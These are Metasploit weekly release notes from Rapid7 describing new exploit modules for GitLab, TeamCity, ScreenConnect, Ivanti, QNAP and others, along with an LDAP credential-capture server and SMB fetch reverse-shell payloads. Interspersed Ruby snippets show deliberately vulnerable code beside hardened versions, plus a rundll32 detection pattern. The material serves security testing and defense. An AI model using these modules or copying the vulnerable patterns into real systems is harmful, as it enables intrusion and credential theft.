Metasploit Wrap-Up 03/15/2024

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2024/03/15/metasploit-wrap-up-03-15-24/

New module content (3)

GitLab Password Reset Account Takeover

Authors: asterion04 and h00die
Type: Auxiliary
Pull request: #18716 contributed by h00die
Path: admin/http/gitlab_password_reset_account_takeover
AttackerKB reference: CVE-2023-7028

Description: This adds an exploit module that leverages an account takeover vulnerability to take control of a GitLab account without user interaction. The vulnerability lies in the password reset functionality: it is possible to supply two email addresses so that the reset code is sent to both. An attacker can therefore provide the email address of the target account together with one they control, and reset the password.
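The pattern described above, as an added example that is not GitLab's or the module's code: a password-reset handler that uses whatever the `email` parameter carries, beside one that accepts exactly one address and mails the token only to the address on file. The `USERS` store, the `Mailer` class and the `reset_*` function names are assumptions.

```ruby
require 'securerandom'

# Constructed account store: registered address => account name (assumption).
USERS = { 'victim@example.com' => 'victim', 'alice@example.com' => 'alice' }.freeze

# Records every (recipient, token) pair a handler would e-mail, so a caller can
# see exactly who received a reset token.
class Mailer
  attr_reader :sent
  def initialize; @sent = []; end
  def deliver(to, token); @sent << [to, token]; end
end

# Vulnerable pattern: the parameter is used as given. A request carrying
# email[]=victim@example.com&email[]=attacker@example.com arrives as an Array,
# and one token is mailed to every address in it, the registered one included.
def reset_vulnerable(params, mailer)
  emails = Array(params['email'])
  token = SecureRandom.hex(16)
  emails.each { |e| mailer.deliver(e, token) }
  token
end

# Hardened pattern: exactly one String, normalised, looked up as a registered
# account, with the token sent to the stored address rather than the input.
# Returns :rejected for malformed input and :ok otherwise; :ok is returned even
# when no account matches so the response does not reveal which addresses exist.
def reset_hardened(params, mailer)
  email = params['email']
  return :rejected unless email.is_a?(String)
  email = email.strip.downcase
  # A single field must hold a single address; list separators are refused.
  return :rejected if email.empty? || email.match?(/[,;\s]/)
  mailer.deliver(email, SecureRandom.hex(16)) if USERS.key?(email)
  :ok
end
```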

MinIO Bootstrap Verify Information Disclosure

Authors: RicterZ and joel <joel @ ndepthsecurity>
Type: Auxiliary
Pull request: #18775 contributed by 6a6f656c
Path: gather/minio_bootstrap_verify_info_disc
AttackerKB reference: CVE-2023-28432

Description: This adds an auxiliary module that leverages an information disclosure (CVE-2023-28432) in a cluster deployment of MinIO versions from RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z. This retrieves all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD.

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18922 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2024_27198
AttackerKB reference: CVE-2024-27198

Description: This adds an exploit module that leverages an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198) to achieve unauthenticated RCE. The authentication bypass enables access to the REST API and creates a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload.

Enhancements and features (5)

  • #18835 from zgoldman-r7 – This PR reduces code duplication in the modules/exploits/windows/mssql/mssql_payload module.
  • #18899 from zeroSteiner – Updates the tools/payloads/ysoserial/dot_net.rb tool to add options for encoding the resulting payload as a viewstate.
  • #18930 from dwelch-r7 – This PR adds the ability to run a help command from within the interactive SQL prompt.
  • #18931 from cgranleese-r7 – Adds additional help information when interacting with an SQL session.
  • #18932 from adfoster-r7 – This PR adds PostgreSQL session type acceptance tests using Allure report generation as well as a local test module.

Bugs fixed (5)

  • #18944 from zeroSteiner – This fixes an issue when saving and loading DNS rules from the config.
  • #18945 from adfoster-r7 – Fixes an issue that caused a crash when running http crawler with database connected.
  • #18949 from zeroSteiner – This updates the DNS feature to notify the user a restart is required when the feature is enabled or disabled.
  • #18952 from cgranleese-r7 – Updates Postgres hashdump module to now work with newer versions of Postgres.
  • #18954 from adfoster-r7 – This PR fixes an issue where modules were not honoring spooler settings.

Documentation added (3)

  • #18868 from zeroSteiner – This adds documentation for the new DNS command.
  • #18937 from jjoshm – Fixes a typo in the Kerberos documentation.
  • #18951 from adfoster-r7 – This PR improves documentation on running Postgres acceptance tests locally.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Wrap-Up 03/08/2024

Post Syndicated from Jacquie Harris original https://blog.rapid7.com/2024/03/08/metasploit-wrap-up-03-08-2024/

New module content (2)

GitLab Tags RSS feed email disclosure

Authors: erruquill and n00bhaxor
Type: Auxiliary
Pull request: #18821 contributed by n00bhaxor
Path: gather/gitlab_tags_rss_feed_email_disclosure
AttackerKB reference: CVE-2023-5612

Description: This adds an auxiliary module that leverages an information disclosure vulnerability (CVE-2023-5612) in GitLab versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 to retrieve user email addresses via the tags RSS feed.

BoidCMS Command Injection

Authors: 1337kid and bwatters-r7
Type: Exploit
Pull request: #18827 contributed by bwatters-r7
Path: multi/http/cve_2023_38836_boidcms
AttackerKB reference: CVE-2023-38836

Description: This PR adds an authenticated RCE against BoidCMS versions 2.0.0 and earlier. The underlying issue in CVE-2023-38836 is that the file upload check allows a PHP file to be uploaded and executed as a media file if a GIF header is present in the PHP file.
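An added illustration of the upload check described above (not BoidCMS's code): a validator that trusts the GIF magic bytes alone, beside one that ties the extension to an allow list, checks that the magic bytes match that extension, refuses script tags in the body, and stores the file under a server-chosen name. The `IMAGE_TYPES` table and the function names are assumptions.

```ruby
require 'securerandom'

GIF_MAGICS = ['GIF87a', 'GIF89a'].freeze

# Allow-listed extensions and the magic bytes each must begin with (assumption:
# a media upload only needs these three types).
IMAGE_TYPES = {
  'gif' => GIF_MAGICS,
  'png' => ["\x89PNG\r\n\x1a\n".b],
  'jpg' => ["\xFF\xD8\xFF".b],
}.freeze

# Vulnerable pattern: "is it an image?" is answered by the first bytes only.
# A PHP file that starts with GIF89a passes, keeps its .php name on disk,
# and is executed by the web server when requested.
def accept_upload_vulnerable?(_filename, data)
  GIF_MAGICS.any? { |m| data.b.start_with?(m) }
end

# Hardened pattern: the extension must be on the allow list, the content must
# match that extension, and script tags anywhere in the body are refused so a
# GIF/PHP polyglot cannot be smuggled through.
def accept_upload_hardened?(filename, data)
  ext = File.extname(filename).delete_prefix('.').downcase
  magics = IMAGE_TYPES[ext]
  return false unless magics
  body = data.b
  return false unless magics.any? { |m| body.start_with?(m) }
  return false if ['<?php'.b, '<?='.b, '<script'.b].any? { |tag| body.include?(tag) }
  true
end

# Server-chosen storage name: the validated extension is kept, the client's
# name is discarded, so the client never gets to pick a script extension.
def stored_name(filename)
  ext = File.extname(filename).delete_prefix('.').downcase
  "#{SecureRandom.hex(8)}.#{ext}"
end
```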

Enhancements and features (11)

  • #18686 from h00die – This updates the existing auxiliary/scanner/ssh/ssh_version module with new checks for supported cryptographic algorithms and version detection capabilities.
  • #18715 from errorxyz – This adds a Splunk library for use by future modules. It also updates the existing exploit/multi/http/splunk_privilege_escalation_cve_2023_32707 module to use it.
  • #18796 from errorxyz – This updates the ManageEngine Endpoint Central and ServiceDesk Plus RCE modules for CVE-2022-47966. Particularly, it adds a Java target to be able to use Java-based payloads.
  • #18862 from sjanusz-r7 – This PR aligns the client’s peerhost and peerport API for the recently added SQL-based sessions (postgres, mssql, mysql).
  • #18875 from dwelch-r7 – This PR adds conditional validation of options depending on the chosen connection type, so for example if you want to connect via RHOST we also check (where applicable) that RPORT or the USERNAME is set. When a connection is made over an existing SESSION we can still allow the user to only set SESSION and not worry about the missing values only required for a new RHOST connection.
  • #18887 from cgranleese-r7 – Updates the search command to now search modules that are compatible with a specified session type, for instance: search session_type:meterpreter or search session_type:smb.
  • #18903 from sjanusz-r7 – This PR improves the UX by correctly handling databases changes by updating the prompt to now get the appropriate database value in the context of a MySQL or MSSQL session.
  • #18905 from cgranleese-r7 – Improves the pwd command output for SMB sessions.
  • #18908 from adfoster-r7 – Update SAMR computer and ICPR cert to support SMB sessions.
  • #18921 from dwelch-r7 – This adds the IP address to the SMB session prompt when there is no selected share.
  • #18926 from cgranleese-r7 – Update sessions to have a consistent set of local file system commands.

Bugs fixed (5)

  • #18844 from sfewer-r7 – This fixes a bug in the file dropper mixin that would prevent files from being deleted with a Windows shell session.
  • #18897 from adfoster-r7 – Updates the smb_login module to support configuring the negotiated SMB protocol versions and whether encryption is negotiated.
  • #18904 from double16 – Fixes the windows/gather/bloodhound module to no longer incorrectly validate the OutputDirectory option.
  • #18920 from dwelch-r7 – This PR fixes an issue with the autorunscript module option within an SMB session.
  • #18928 from dwelch-r7 – This PR fixes an issue when running the auxiliary/gather/windows_secrets_dump module while using the SESSION module option to connect, that caused the client to be disconnected and unable to be reused for subsequent runs/other modules.

Documentation (1)

  • #18929 from adfoster-r7 – Updates the Metasploit API documentation library to the latest available version to avoid CVE-2024-27285 – an XSS in the default YARD template. Thanks to Aviv Keller for reporting.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 03/01/2024

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2024/03/01/metasploit-weekly-wrap-up-03-01-2024/

Connect the dots from authentication bypass to remote code execution

This week, our very own sfewer-r7 added a new exploit module that leverages an authentication bypass vulnerability in ConnectWise ScreenConnect to achieve remote code execution. This vulnerability, CVE-2024-1709, affects all versions of ConnectWise ScreenConnect up to and including 23.9.7. The module creates a new administrator user account on the server, which is then used to upload a malicious extension (.ashx file) and get code execution as the NT AUTHORITY\SYSTEM user on Windows or the root user on Linux, depending on the target platform.

New module content (1)

ConnectWise ScreenConnect Unauthenticated Remote Code Execution

Authors: WatchTowr and sfewer-r7
Type: Exploit
Pull request: #18870 contributed by sfewer-r7
Path: multi/http/connectwise_screenconnect_rce_cve_2024_1709

Description: This PR adds an unauthenticated RCE exploit for ConnectWise ScreenConnect (CVE-2024-1709).

Enhancements and features (8)

  • #18830 from sjanusz-r7 – Aligns the behavior of the MSSQL, PostgreSQL, and MySQL sessions. This functionality is currently behind a feature flag enabled with the features command.
  • #18833 from zeroSteiner – This catches an exception when updating a non-existing session. Prior to this PR, trying to run ‘sessions -k’ after running ‘workspace -D’ would result in a stack trace being printed to the console. This resolves issue #18561.
  • #18849 from adfoster-r7 – Adjusts the logic used for the visual indentation of tables.
  • #18872 from zgoldman-r7 – Updates the MSSQL modules to support querying database rows that contain boolean bit values.
  • #18878 from adfoster-r7 – This updates a number of rspec gems which help improve test suite error messages when string encodings are different.
  • #18879 from zeroSteiner – Updates the auxiliary/admin/kerberos/inspect_ticket module with improved error messages and support for printing Kerberos PAC credential information.
  • #18892 from zeroSteiner – Allows users to leverage the latest ADCS ESC13 technique. These changes are related to the identification of misconfigured certificate templates and workflow documentation. ldap_esc_vulnerable_cert_finder and ldap_query were also updated to improve usability.
  • #18893 from sjanusz-r7 – Updates the help command to visually align command names to the same width to improve readability.

Bugs fixed (2)

  • #18873 from cgranleese-r7 – Fixes a regression that caused a CreateSession option to be available for payloads that did not make sense.
  • #18880 from jmartin-tech – Fixes a bug with the auxiliary/capture/ldap module’s handling of NTLM hashes.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 02/23/2024

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2024/02/23/metasploit-weekly-wrap-up-02-23-2024/

LDAP Capture module

Metasploit now has an LDAP capture module thanks to the work of JustAnda7. This work was completed as part of the Google Summer of Code program.

When the module runs it will by default require privileges to listen on port 389. The module provides default implementations for BindRequest, SearchRequest and UnbindRequest, and captures both plaintext credentials and NTLM hashes, which can be brute-forced offline. Upon receiving a successful Bind Request, an ldap_bind: Authentication method not supported (7) error is sent to the connecting client.

The module can be run with:

msf6 > use auxiliary/server/capture/ldap
msf6 auxiliary(server/capture/ldap) > run

Incoming requests will have their credentials stored for later use:

[+] LDAP Login attempt => From:10.0.2.15:48198 Username:User Password:Pass
[+] LDAP Login Attempt => From:127.0.0.1:55566	 Username:admin	 ntlm_hash::8aa0e517cd547b4032ff7e9c5359c200879aa5a8031d3d74	 Domain:DOMAIN

These values will be stored in the database for later retrieval:

msf6 auxiliary(server/capture/ldap) > creds
Credentials
===========
host       origin     service         public  private  realm        private_type  JtR Format
----       ------     -------         ------  -------  -----        ------------  ----------
10.0.2.15  10.0.2.15  389/tcp (ldap)  User    Pass     example.com  Password      

Ivanti exploit module

Another honorable mention for this week’s Metasploit release is a module by sfewer-r7 that chains two recently disclosed vulnerabilities (CVE-2024-21893 and CVE-2024-21887) in Ivanti gateways to achieve remote code execution on a vulnerable target. Both vulnerabilities are being widely exploited in the wild. Read Rapid7’s full technical analysis of the exploit chain in AttackerKB.

New module content (4)

Authentication Capture: LDAP

Author: JustAnda7
Type: Auxiliary
Pull request: #18678 contributed by jmartin-tech
Path: server/capture/ldap

Description: Adds a new auxiliary/server/capture/ldap module that emulates an LDAP Server. The server accepts a user’s bind request, and the user credentials or NTLM hash is then captured, logged, and persisted to the currently active database. An ldap_bind: Authentication method not supported (7) error is sent to the connecting client.

Ivanti Connect Secure Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18792 contributed by sfewer-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2024_21893
AttackerKB references: CVE-2024-21887, CVE-2023-36661, CVE-2024-21893

Description: This module exploits the recently disclosed SSRF vulnerability (CVE-2024-21893) in Ivanti Connect Secure and Ivanti Policy Secure. The SSRF is chained to a command injection vulnerability (CVE-2024-21887) to achieve unauthenticated RCE.

Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.

Authors: BobTheShopLifter, Thingstad, and h00die-gr3y
Type: Exploit
Pull request: #18700 contributed by h00die-gr3y
Path: linux/http/kafka_ui_unauth_rce_cve_2023_52251
AttackerKB reference: CVE-2023-52251

Description: This PR adds an exploit module for a command injection vulnerability that exists in Kafka-ui between v0.4.0 and v0.7.1 that allows an attacker to inject and execute arbitrary shell commands via the groovy filter parameter at the topic section.

QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution in quick.cgi

Authors: Spencer McIntyre, jheysel-r7, and sfewer-r7
Type: Exploit
Pull request: #18832 contributed by sfewer-r7
Path: linux/http/qnap_qts_rce_cve_2023_47218
AttackerKB reference: CVE-2023-47218

Description: The PR adds a module targeting CVE-2023-47218, an unauthenticated command injection vulnerability affecting QNAP QTS and QuTS Hero devices. CVE-2023-47218 was discovered and disclosed by Stephen Fewer.

Enhanced Modules (2)

Modules which have either been enhanced, or renamed:

  • #18125 from JustAnda7 – This PR adds a module to launch an LDAP service supporting capture and storage of Simple Authentication attempts. When launching this module with default options users must have permissions to bind to port 389.
  • #18681 from h00die – This PR updates the pre-existing apache_ofbiz_deserialization module to include functionality that will bypass authentication by using the newly discovered auth-bypass vulnerability: CVE-2023-51467.

Enhancements and features (8)

  • #18376 from JustAnda7 – This PR adds support for LDAP capture of NTLM authentication and adds a default implementation for LDAP BindRequest, SearchRequest, UnbindRequest, as well as a default action for unsupported requests.
  • #18817 from dwelch-r7 – This PR adds support to now bucket module options that are output after running the options command. This will be for modules that support either an RHOST or a SESSION connection to show that only one or the other is required when using the new session type features for SMB/MSSQL/MYSQL/PostgreSQL sessions.
  • #18847 from sjanusz-r7 – This PR adds proxy support for getting a PostgreSQL session via the postgres_login module.
  • #18848 from sjanusz-r7 – This PR adds proxy support for getting a MSSQL session via the mssql_login module.
  • #18854 from sjanusz-r7 – This PR adds proxy support for getting a MySQL session via the mysql_login module.
  • #18855 from sjanusz-r7 – This PR removes the cwd convention from SQL-based sessions, and instead uses a more appropriate def database_name computed value rather than a cached variable.
  • #18863 from sjanusz-r7 – This PR adds in the ENVCHANGE types to the MSSQL client mixin, and uses those to fetch the initial DB name received from the server.
  • #18864 from cgranleese-r7 – Adds an alias for ls and dir inside SMB sessions.

Bugs fixed (5)

  • #18770 from dwelch-r7 – Fixes a bug when multiple new session types (SMB, PostgreSQL, MSSQL, MySQL) were enabled with the features set postgresql_session_type true command.
  • #18842 from upsidedwn – Updates the Metasploit Dockerfile to correctly honor user provided bundler config arguments.
  • #18850 from adfoster-r7 – Fixes failing ldap server tests.
  • #18861 from cgranleese-r7 – Removes SessionType values from modules with OptionalSession mixin.
  • #18871 from adfoster-r7 – Fixes a crash when using the webconsole.

Documentation added (1)

  • #18857 from jlownie – Updates the Wiki documentation on running the Metasploit database to be more clear.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 02/16/2024

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2024/02/16/metasploit-weekly-wrap-up-02-16-2024/

New Fetch Payload

It has been almost a year since Metasploit released the new fetch payloads, and since then 43 of the 79 exploit modules have had support for fetch payloads. The original payloads supported transferring the second stage over HTTP, HTTPS and FTP. This week, Metasploit has expanded that protocol support to include SMB, allowing payloads to be run using rundll32, which has the added benefit of capturing the NetNTLM hashes of the requestor.

This also streamlines the workflow the user would have previously used by first starting the exploit/windows/smb/smb_delivery module, and then copying the command into another exploit. Now the user can simply select one of the SMB-enabled fetch payloads and Metasploit will manage the service and generate the command.

As an added benefit, since #18680 merged into Metasploit, multiple SMB services can be run simultaneously. This means that multiple SMB-enabled fetch payloads can have their own independent handlers running at the same time.
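An added detection sketch for the workflow described above (not Metasploit's code): SMB-delivered fetch payloads run rundll32 against a UNC path, so a process-creation log can be scanned for that combination. The log lines are constructed in a simplified Sysmon-like key="value" form; the field names and the `suspicious_rundll32?` function are assumptions.

```ruby
# Constructed process-creation events, one per line, Sysmon-style fields
# flattened to key="value" pairs (assumption about the log format).
SAMPLE_LOG = <<~'LOG'
  EventID=1 Image="C:\Windows\System32\rundll32.exe" CommandLine="rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL" User="CORP\alice"
  EventID=1 Image="C:\Windows\System32\rundll32.exe" CommandLine="rundll32.exe \\10.0.2.15\share\fetch.dll,0" User="CORP\bob"
  EventID=1 Image="C:\Windows\System32\cmd.exe" CommandLine="cmd.exe /c dir \\fileserver\public" User="CORP\carol"
  EventID=3 Image="C:\Windows\System32\rundll32.exe" DestinationIp="10.0.2.15" DestinationPort="445" User="CORP\bob"
LOG

# Parses key="value" and key=value pairs of one line into a Hash.
def parse_event(line)
  line.scan(/(\w+)=(?:"([^"]*)"|(\S+))/).each_with_object({}) do |(k, q, u), h|
    h[k] = q || u
  end
end

# A DLL loaded by rundll32 from a UNC path (\\host\share\file.dll) is the
# signature of an SMB fetch stage; a DLL loaded from a local path must not match.
UNC_DLL = %r{\\\\[\w.-]+\\[^\s,"]+\.dll}i

def suspicious_rundll32?(event)
  return false unless event['EventID'] == '1'
  # File.basename does not split on backslashes on Linux, so split by hand.
  image = event['Image'].to_s.split(%r{[\\/]}).last.to_s
  return false unless image.casecmp?('rundll32.exe')
  event['CommandLine'].to_s.match?(UNC_DLL)
end

# Returns one alert string per matching event, naming the user and the host
# the DLL was fetched from (the SMB server that would also see the NetNTLM hash).
def scan_log(text)
  text.each_line.map { |l| parse_event(l) }.select { |e| suspicious_rundll32?(e) }.map do |e|
    host = e['CommandLine'][UNC_DLL].split('\\')[2]
    "rundll32 UNC load by #{e['User']} from #{host}"
  end
end
```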

New module content (2)

Base64 Command Encoder

Author: Spencer McIntyre
Type: Encoder
Pull request: #18807 contributed by zeroSteiner

Description: This adds a new encoder module that leverages base64 encoding to escape bad characters in ARCH_CMD payloads for the Linux and UNIX platforms.

SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager

Authors: Spencer McIntyre, bwatters-r7, and sf
Type: Payload (Adapter)
Pull request: #18664 contributed by zeroSteiner

Description: This adds an SMB fetch-payload service and a new payload to use it. The payload invokes rundll32 but handles everything for the user automatically.

This adapter adds the following payloads:

  • cmd/windows/smb/x64/custom/bind_ipv6_tcp
  • cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/custom/bind_named_pipe
  • cmd/windows/smb/x64/custom/bind_tcp
  • cmd/windows/smb/x64/custom/bind_tcp_rc4
  • cmd/windows/smb/x64/custom/bind_tcp_uuid
  • cmd/windows/smb/x64/custom/reverse_http
  • cmd/windows/smb/x64/custom/reverse_https
  • cmd/windows/smb/x64/custom/reverse_named_pipe
  • cmd/windows/smb/x64/custom/reverse_tcp
  • cmd/windows/smb/x64/custom/reverse_tcp_rc4
  • cmd/windows/smb/x64/custom/reverse_tcp_uuid
  • cmd/windows/smb/x64/custom/reverse_winhttp
  • cmd/windows/smb/x64/custom/reverse_winhttps
  • cmd/windows/smb/x64/encrypted_shell/reverse_tcp
  • cmd/windows/smb/x64/encrypted_shell_reverse_tcp
  • cmd/windows/smb/x64/exec
  • cmd/windows/smb/x64/loadlibrary
  • cmd/windows/smb/x64/messagebox
  • cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp
  • cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/bind_named_pipe
  • cmd/windows/smb/x64/meterpreter/bind_tcp
  • cmd/windows/smb/x64/meterpreter/bind_tcp_rc4
  • cmd/windows/smb/x64/meterpreter/bind_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/reverse_http
  • cmd/windows/smb/x64/meterpreter/reverse_https
  • cmd/windows/smb/x64/meterpreter/reverse_named_pipe
  • cmd/windows/smb/x64/meterpreter/reverse_tcp
  • cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4
  • cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/reverse_winhttp
  • cmd/windows/smb/x64/meterpreter/reverse_winhttps
  • cmd/windows/smb/x64/meterpreter_bind_named_pipe
  • cmd/windows/smb/x64/meterpreter_bind_tcp
  • cmd/windows/smb/x64/meterpreter_reverse_http
  • cmd/windows/smb/x64/meterpreter_reverse_https
  • cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp
  • cmd/windows/smb/x64/meterpreter_reverse_tcp
  • cmd/windows/smb/x64/peinject/bind_ipv6_tcp
  • cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/peinject/bind_named_pipe
  • cmd/windows/smb/x64/peinject/bind_tcp
  • cmd/windows/smb/x64/peinject/bind_tcp_rc4
  • cmd/windows/smb/x64/peinject/bind_tcp_uuid
  • cmd/windows/smb/x64/peinject/reverse_named_pipe
  • cmd/windows/smb/x64/peinject/reverse_tcp
  • cmd/windows/smb/x64/peinject/reverse_tcp_rc4
  • cmd/windows/smb/x64/peinject/reverse_tcp_uuid
  • cmd/windows/smb/x64/pingback_reverse_tcp
  • cmd/windows/smb/x64/powershell_bind_tcp
  • cmd/windows/smb/x64/powershell_reverse_tcp
  • cmd/windows/smb/x64/powershell_reverse_tcp_ssl
  • cmd/windows/smb/x64/shell/bind_ipv6_tcp
  • cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/shell/bind_named_pipe
  • cmd/windows/smb/x64/shell/bind_tcp
  • cmd/windows/smb/x64/shell/bind_tcp_rc4
  • cmd/windows/smb/x64/shell/bind_tcp_uuid
  • cmd/windows/smb/x64/shell/reverse_tcp
  • cmd/windows/smb/x64/shell/reverse_tcp_rc4
  • cmd/windows/smb/x64/shell/reverse_tcp_uuid
  • cmd/windows/smb/x64/shell_bind_tcp
  • cmd/windows/smb/x64/shell_reverse_tcp
  • cmd/windows/smb/x64/vncinject/bind_ipv6_tcp
  • cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/vncinject/bind_named_pipe
  • cmd/windows/smb/x64/vncinject/bind_tcp
  • cmd/windows/smb/x64/vncinject/bind_tcp_rc4
  • cmd/windows/smb/x64/vncinject/bind_tcp_uuid
  • cmd/windows/smb/x64/vncinject/reverse_http
  • cmd/windows/smb/x64/vncinject/reverse_https
  • cmd/windows/smb/x64/vncinject/reverse_tcp
  • cmd/windows/smb/x64/vncinject/reverse_tcp_rc4
  • cmd/windows/smb/x64/vncinject/reverse_tcp_uuid
  • cmd/windows/smb/x64/vncinject/reverse_winhttp
  • cmd/windows/smb/x64/vncinject/reverse_winhttps

Enhancements and features (7)

  • #18706 from sjanusz-r7 – Updates multiple PostgreSQL modules to now work with PostgreSQL sessions. This functionality is behind a feature flag which can be enabled with features set postgres_session_type true.
  • #18747 from zgoldman-r7 – Updates the auxiliary/scanner/mssql/mssql_login module with a new CreateSession option which controls the opening of an interactive MSSQL session. This functionality is currently behind a feature flag which can be enabled with features set mssql_session_type true.
  • #18759 from cgranleese-r7 – Updates the multiple MySQL modules to work with a provided MySQL session instead of opening a new connection. This functionality is behind a feature flag which can be enabled with features set mysql_session_type true.
  • #18763 from zgoldman-r7 – Updates multiple MSSQL modules to now work with the new MSSQL session type that is enabled with features set mssql_session_type true.
  • #18806 from cgranleese-r7 – Improves unknown command handling by suggesting similar valid commands.
  • #18809 from zeroSteiner – Makes multiple improvements to the dns command – a new command which mimics the functionality of /etc/resolv.conf and /etc/hosts. This functionality is currently behind a feature flag which can be enabled with features set dns_feature true in msfconsole.
  • #18825 from cgranleese-r7 – Improves the error messages when the current session is not compatible with a post module.

Bugs fixed (13)

  • #18616 from adfoster-r7 – This fixes an issue with the AARCH64 SO ELF template that was causing SIGBUS exceptions to be raised.
  • #18774 from adfoster-r7 – Updates the following modules to now work with newer versions of sqlcmd: post/windows/gather/credentials/mssql_local_hashdump and post/windows/manage/mssql_local_auth_bypass.
  • #18786 from lihe07 – This fixes an option name collision between the exploit/linux/local/service_persistence module and the cmd/unix/reverse_netcat payload. The option to set the writable path is now BACKDOOR_PATH.
  • #18795 from cgranleese-r7 – Moves the CreateSession option from advanced into basic options for modules, in order to increase discoverability.
  • #18798 from upsidedwn – This fixes an issue in the exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move module’s check method that was causing version comparisons to fail.
  • #18799 from upsidedwn – This fixes an issue in the exploit/windows/local/cve_2020_17136 module’s check method that was causing version comparisons to fail.
  • #18800 from upsidedwn – This fixes an issue in the exploit/windows/local/cve_2021_40449 module’s check method that was causing version comparisons to fail.
  • #18801 from upsidedwn – This fixes an issue in the exploit/windows/local/cve_2022_26904_superprofile module’s check method that was causing version comparisons to fail.
  • #18812 from adfoster-r7 – Reverts the auxiliary/scanner/mssql/mssql_login module’s TDSENCRYPTION default value to false.
  • #18813 from adfoster-r7 – Fixes a crash when running the help services or help hosts commands.
  • #18823 from cdelafuente-r7 – Fix module metadata platform list comparison.
  • #18826 from dwelch-r7 – Fixes a regression where the windows/smb/psexec module was not correctly performing cleanup logic.
  • #18828 from dwelch-r7 – Fixes a crash when exploit modules used nops.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 02/09/2024

Post Syndicated from Jack Heysel original https://blog.rapid7.com/2024/02/09/metasploit-weekly-wrap-up-02-09-2024/

Go go gadget Fortra GoAnywhere MFT Module

This Metasploit release contains a module for one of 2024’s hottest vulnerabilities to date: CVE-2024-0204. The path traversal vulnerability in Fortra GoAnywhere MFT allows unauthenticated attackers to access the InitialAccountSetup.xhtml endpoint, which is used during the product’s initial setup to create the first administrator user. After setup has completed, this endpoint is supposed to be no longer available. Attackers can use this vulnerability to create a user with Administrator privileges. Once administrative privileges have been obtained for the GoAnywhere MFT application, uploading a .jsp payload in order to achieve RCE is trivial.
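An added illustration of the class of bug described above, not Fortra's code: a gate that blocks the setup endpoint by comparing the raw request path, beside one that canonicalises the path (strips the query, percent-decodes, collapses `.` and `..` segments and repeated slashes, compares case-insensitively) before deciding. The function names and the `SETUP_ENDPOINT` constant are assumptions.

```ruby
SETUP_ENDPOINT = '/InitialAccountSetup.xhtml'.freeze

# Vulnerable pattern: the gate compares the path exactly as the client sent it,
# while the component that serves the file resolves traversal itself, so any
# spelling of the path other than the literal one slips past the gate.
def blocked_vulnerable?(raw_path, setup_complete)
  setup_complete && raw_path == SETUP_ENDPOINT
end

# Canonicalises a request path: strips the query string, percent-decodes, then
# resolves "." and ".." segments and drops empty ones, as a servlet container
# would before mapping the path to a resource.
def canonical_path(raw_path)
  path = raw_path.split('?', 2).first.to_s
  path = path.b.gsub(/%([0-9a-f]{2})/i) { $1.hex.chr }.force_encoding(Encoding::UTF_8)
  segments = []
  path.split('/').each do |seg|
    case seg
    when '', '.' then next
    when '..' then segments.pop
    else segments << seg
    end
  end
  '/' + segments.join('/')
end

# Hardened pattern: canonicalise first, then compare case-insensitively, so the
# gate sees the same resource the file-serving layer will resolve.
def blocked_hardened?(raw_path, setup_complete)
  setup_complete && canonical_path(raw_path).casecmp?(SETUP_ENDPOINT)
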